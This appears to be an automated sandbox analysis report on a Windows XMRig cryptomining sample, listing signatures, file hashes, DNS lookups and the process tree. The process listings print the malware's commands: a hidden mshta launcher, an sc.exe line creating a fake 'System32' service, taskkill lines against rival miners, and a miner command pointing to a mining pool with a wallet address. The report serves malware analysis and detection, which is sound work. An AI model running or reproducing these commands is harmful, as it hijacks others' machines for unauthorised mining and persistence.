Analysis Overview
SHA256
f685ce44137ae97fb87e6975f98b2823a62e14074059513afef5261cd643c1ee
Threat Level: Known bad
The file 368dbaa22a7006b92d0165706fc78b47_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
xmrig
XMRig Miner payload
Creates new service(s)
Loads dropped DLL
VMProtect packed file
Checks computer location settings
Executes dropped EXE
Drops file in System32 directory
Launches sc.exe
Enumerates physical storage devices
Unsigned PE
Kills process with taskkill
Runs net.exe
Runs ping.exe
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Modifies Internet Explorer settings
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-11 21:07
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-11 21:07
Reported
2024-05-11 21:10
Platform
win7-20240508-en
Max time kernel
148s
Max time network
146s
Command Line
Signatures
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Creates new service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\java.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\winlgon.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\java.exe | N/A |
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\SysWOW64\winlgon.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\368dbaa22a7006b92d0165706fc78b47_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\368dbaa22a7006b92d0165706fc78b47_JaffaCakes118.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Windows\System32\fuwu.bat" "
C:\Windows\SysWOW64\mshta.exe
mshta vbscript:createobject("wscript.shell").run("""fuwu.bat"" h",0)(window.close)
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Windows\System32\fuwu.bat" h"
C:\Windows\SysWOW64\sc.exe
sc create System32 binPath= C:\Windows\System32\java.exe start= auto
C:\Windows\SysWOW64\taskkill.exe
taskkill /im mscorsvw.exe /f
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im mscorsvw.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /im WUDFHost.exe /f
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im WUDFHost.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /im nheqminer.exe /f
C:\Windows\SysWOW64\taskkill.exe
taskkill /im NsCpuCNMiner32.exe /f
C:\Windows\SysWOW64\taskkill.exe
taskkill /im NsCpuCNMiner64.exe /f
C:\Windows\SysWOW64\taskkill.exe
taskkill /im winz.exe /f
C:\Windows\SysWOW64\taskkill.exe
taskkill /im minergey.exe /f
C:\Windows\SysWOW64\taskkill.exe
taskkill /im winloz.exe /f
C:\Windows\SysWOW64\taskkill.exe
taskkill /im minergay.exe /f
C:\Windows\SysWOW64\PING.EXE
ping -n 5 127.0.0.1
C:\Windows\SysWOW64\net.exe
net start System32
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start System32
C:\Windows\SysWOW64\java.exe
C:\Windows\SysWOW64\java.exe
C:\Windows\SysWOW64\winlgon.exe
C:\Windows\System32\winlgon.exe -o get.bi-chi.com:3333 -u 48YtGrPyniHcfKNyq9CR2X6T4rnvg88BmRqghjxEHFKLE7VzpbhvkYADAU81CK3xZvWqjGSsQrhz5ZXDxn9LnRWkGaEjU2P -p x -k
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | get.bi-chi.com | udp |
Files
C:\Windows\SysWOW64\fuwu.bat
| MD5 | cdd4517388ec55cb24be5023c4718735 |
| SHA1 | 64647a505385a7b93f72d2af17a7f07905a93f2a |
| SHA256 | 06829ea1b1a2f5e0325414d585b5fad6eebbecd74697596a6148d922ff3ea304 |
| SHA512 | 2484704cd6ad625b5b81d593155ead63546d64e8693093e328512bbfd0240a24297f347aa2df6101c265c8b16d52131eab96ff545e268aec53d999026040f011 |
C:\Windows\SysWOW64\java.exe
| MD5 | cf7341a71cb0117e651fd1b4dc414657 |
| SHA1 | b34b4aa0f90fa9e02d4bd3fc64644b07d27876f4 |
| SHA256 | d55e4e16c8c60095c9897bea7db8fb71bf099008a3bc942a6062ffd5c0f05b27 |
| SHA512 | a161caafacaea87caada40b52753512ca83242e3c5a129793686843fdecb667e0fa5b92a384c260a7f11f38009fa787a39e8487628fb52bb81c1dd813c293859 |
memory/1920-25-0x0000000000400000-0x000000000055E000-memory.dmp
C:\Windows\SysWOW64\java.ini
| MD5 | c2470dbbb0b0a658b6fafef4fc8eb6ac |
| SHA1 | ec317b67f322ed527729904ee3b73db2bb307338 |
| SHA256 | bfdbb476971a00b860e68bdddc6d438b73eaa75465e51f369a0d25f7aa251a25 |
| SHA512 | 6316f8a897eb8cc81c3a347fb123d726497ff6acf7a6f1a121d677df236cd69986fc4dcdf65fa51d5d741bb9cc0521673376da04d8308a0dd8c0e10b5e5cfccc |
memory/1920-26-0x0000000000400000-0x000000000055E000-memory.dmp
C:\Windows\SysWOW64\winlgon.exe
| MD5 | 7c00d4b65f8fa21b4934f0f097a79cd0 |
| SHA1 | 9d13938ce7198fe2afb0c5dae3d354729cd0f723 |
| SHA256 | af3ee349a54c7e7606f0b89ca73147cbfcc63f762b1b554c3687cc37db029786 |
| SHA512 | 8f0d4e05453b1fee61144a5ca77990b5d52a771adec1ad9563f988a9b8086afb09f0ef17ba6092b5afbf3de09c6f16023ac80969f878bc2abff0861fc1e66c40 |
memory/2760-35-0x0000000000400000-0x0000000000487000-memory.dmp
memory/2760-36-0x0000000000400000-0x0000000000487000-memory.dmp
memory/1920-37-0x0000000000400000-0x000000000055E000-memory.dmp
memory/2760-38-0x0000000000400000-0x0000000000487000-memory.dmp
memory/2760-39-0x0000000000400000-0x0000000000487000-memory.dmp
memory/2760-40-0x0000000000400000-0x0000000000487000-memory.dmp
memory/2760-41-0x0000000000400000-0x0000000000487000-memory.dmp
memory/2760-42-0x0000000000400000-0x0000000000487000-memory.dmp
memory/2760-43-0x0000000000400000-0x0000000000487000-memory.dmp
memory/2760-44-0x0000000000400000-0x0000000000487000-memory.dmp
memory/2760-45-0x0000000000400000-0x0000000000487000-memory.dmp
memory/2760-46-0x0000000000400000-0x0000000000487000-memory.dmp
memory/2760-47-0x0000000000400000-0x0000000000487000-memory.dmp
memory/2760-48-0x0000000000400000-0x0000000000487000-memory.dmp
memory/2760-49-0x0000000000400000-0x0000000000487000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-11 21:07
Reported
2024-05-11 21:10
Platform
win10v2004-20240508-en
Max time kernel
148s
Max time network
150s
Command Line
Signatures
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Creates new service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\368dbaa22a7006b92d0165706fc78b47_JaffaCakes118.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\java.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\winlgon.exe | N/A |
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\SysWOW64\winlgon.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\368dbaa22a7006b92d0165706fc78b47_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\368dbaa22a7006b92d0165706fc78b47_JaffaCakes118.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Windows\System32\fuwu.bat" "
C:\Windows\SysWOW64\mshta.exe
mshta vbscript:createobject("wscript.shell").run("""fuwu.bat"" h",0)(window.close)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Windows\System32\fuwu.bat" h"
C:\Windows\SysWOW64\sc.exe
sc create System32 binPath= C:\Windows\System32\java.exe start= auto
C:\Windows\SysWOW64\taskkill.exe
taskkill /im mscorsvw.exe /f
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im mscorsvw.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /im WUDFHost.exe /f
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im WUDFHost.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /im nheqminer.exe /f
C:\Windows\SysWOW64\taskkill.exe
taskkill /im NsCpuCNMiner32.exe /f
C:\Windows\SysWOW64\taskkill.exe
taskkill /im NsCpuCNMiner64.exe /f
C:\Windows\SysWOW64\taskkill.exe
taskkill /im winz.exe /f
C:\Windows\SysWOW64\taskkill.exe
taskkill /im minergey.exe /f
C:\Windows\SysWOW64\taskkill.exe
taskkill /im winloz.exe /f
C:\Windows\SysWOW64\taskkill.exe
taskkill /im minergay.exe /f
C:\Windows\SysWOW64\PING.EXE
ping -n 5 127.0.0.1
C:\Windows\SysWOW64\net.exe
net start System32
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start System32
C:\Windows\SysWOW64\java.exe
C:\Windows\SysWOW64\java.exe
C:\Windows\SysWOW64\winlgon.exe
C:\Windows\System32\winlgon.exe -o get.bi-chi.com:3333 -u 48YtGrPyniHcfKNyq9CR2X6T4rnvg88BmRqghjxEHFKLE7VzpbhvkYADAU81CK3xZvWqjGSsQrhz5ZXDxn9LnRWkGaEjU2P -p x -k
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | get.bi-chi.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | get.bi-chi.com | udp |
| US | 8.8.8.8:53 | get.bi-chi.com | udp |
| US | 8.8.8.8:53 | get.bi-chi.com | udp |
| US | 8.8.8.8:53 | get.bi-chi.com | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | get.bi-chi.com | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | get.bi-chi.com | udp |
| US | 8.8.8.8:53 | get.bi-chi.com | udp |
| US | 8.8.8.8:53 | get.bi-chi.com | udp |
| US | 8.8.8.8:53 | get.bi-chi.com | udp |
| US | 8.8.8.8:53 | get.bi-chi.com | udp |
| US | 8.8.8.8:53 | get.bi-chi.com | udp |
| US | 8.8.8.8:53 | get.bi-chi.com | udp |
| US | 8.8.8.8:53 | get.bi-chi.com | udp |
| US | 8.8.8.8:53 | get.bi-chi.com | udp |
| US | 8.8.8.8:53 | get.bi-chi.com | udp |
| US | 8.8.8.8:53 | get.bi-chi.com | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | get.bi-chi.com | udp |
| US | 8.8.8.8:53 | get.bi-chi.com | udp |
| US | 8.8.8.8:53 | get.bi-chi.com | udp |
| US | 8.8.8.8:53 | get.bi-chi.com | udp |
| US | 8.8.8.8:53 | get.bi-chi.com | udp |
| US | 8.8.8.8:53 | get.bi-chi.com | udp |
| US | 8.8.8.8:53 | get.bi-chi.com | udp |
| US | 8.8.8.8:53 | get.bi-chi.com | udp |
| US | 8.8.8.8:53 | get.bi-chi.com | udp |
| US | 8.8.8.8:53 | get.bi-chi.com | udp |
| US | 8.8.8.8:53 | get.bi-chi.com | udp |
| US | 8.8.8.8:53 | get.bi-chi.com | udp |
Files
C:\Windows\SysWOW64\fuwu.bat
| MD5 | cdd4517388ec55cb24be5023c4718735 |
| SHA1 | 64647a505385a7b93f72d2af17a7f07905a93f2a |
| SHA256 | 06829ea1b1a2f5e0325414d585b5fad6eebbecd74697596a6148d922ff3ea304 |
| SHA512 | 2484704cd6ad625b5b81d593155ead63546d64e8693093e328512bbfd0240a24297f347aa2df6101c265c8b16d52131eab96ff545e268aec53d999026040f011 |
C:\Windows\SysWOW64\java.exe
| MD5 | cf7341a71cb0117e651fd1b4dc414657 |
| SHA1 | b34b4aa0f90fa9e02d4bd3fc64644b07d27876f4 |
| SHA256 | d55e4e16c8c60095c9897bea7db8fb71bf099008a3bc942a6062ffd5c0f05b27 |
| SHA512 | a161caafacaea87caada40b52753512ca83242e3c5a129793686843fdecb667e0fa5b92a384c260a7f11f38009fa787a39e8487628fb52bb81c1dd813c293859 |
memory/1052-14-0x0000000000400000-0x000000000055E000-memory.dmp
C:\Windows\SysWOW64\java.ini
| MD5 | c2470dbbb0b0a658b6fafef4fc8eb6ac |
| SHA1 | ec317b67f322ed527729904ee3b73db2bb307338 |
| SHA256 | bfdbb476971a00b860e68bdddc6d438b73eaa75465e51f369a0d25f7aa251a25 |
| SHA512 | 6316f8a897eb8cc81c3a347fb123d726497ff6acf7a6f1a121d677df236cd69986fc4dcdf65fa51d5d741bb9cc0521673376da04d8308a0dd8c0e10b5e5cfccc |
memory/1052-15-0x0000000000400000-0x000000000055E000-memory.dmp
C:\Windows\SysWOW64\winlgon.exe
| MD5 | 7c00d4b65f8fa21b4934f0f097a79cd0 |
| SHA1 | 9d13938ce7198fe2afb0c5dae3d354729cd0f723 |
| SHA256 | af3ee349a54c7e7606f0b89ca73147cbfcc63f762b1b554c3687cc37db029786 |
| SHA512 | 8f0d4e05453b1fee61144a5ca77990b5d52a771adec1ad9563f988a9b8086afb09f0ef17ba6092b5afbf3de09c6f16023ac80969f878bc2abff0861fc1e66c40 |
memory/3508-23-0x0000000000400000-0x0000000000487000-memory.dmp
memory/3508-24-0x0000000000400000-0x0000000000487000-memory.dmp
memory/1052-25-0x0000000000400000-0x000000000055E000-memory.dmp
memory/3508-26-0x0000000000400000-0x0000000000487000-memory.dmp
memory/3508-27-0x0000000000400000-0x0000000000487000-memory.dmp
memory/3508-28-0x0000000000400000-0x0000000000487000-memory.dmp
memory/3508-29-0x0000000000400000-0x0000000000487000-memory.dmp
memory/3508-30-0x0000000000400000-0x0000000000487000-memory.dmp
memory/3508-31-0x0000000000400000-0x0000000000487000-memory.dmp
memory/3508-32-0x0000000000400000-0x0000000000487000-memory.dmp
memory/3508-33-0x0000000000400000-0x0000000000487000-memory.dmp
memory/3508-34-0x0000000000400000-0x0000000000487000-memory.dmp
memory/3508-35-0x0000000000400000-0x0000000000487000-memory.dmp
memory/3508-36-0x0000000000400000-0x0000000000487000-memory.dmp
memory/3508-37-0x0000000000400000-0x0000000000487000-memory.dmp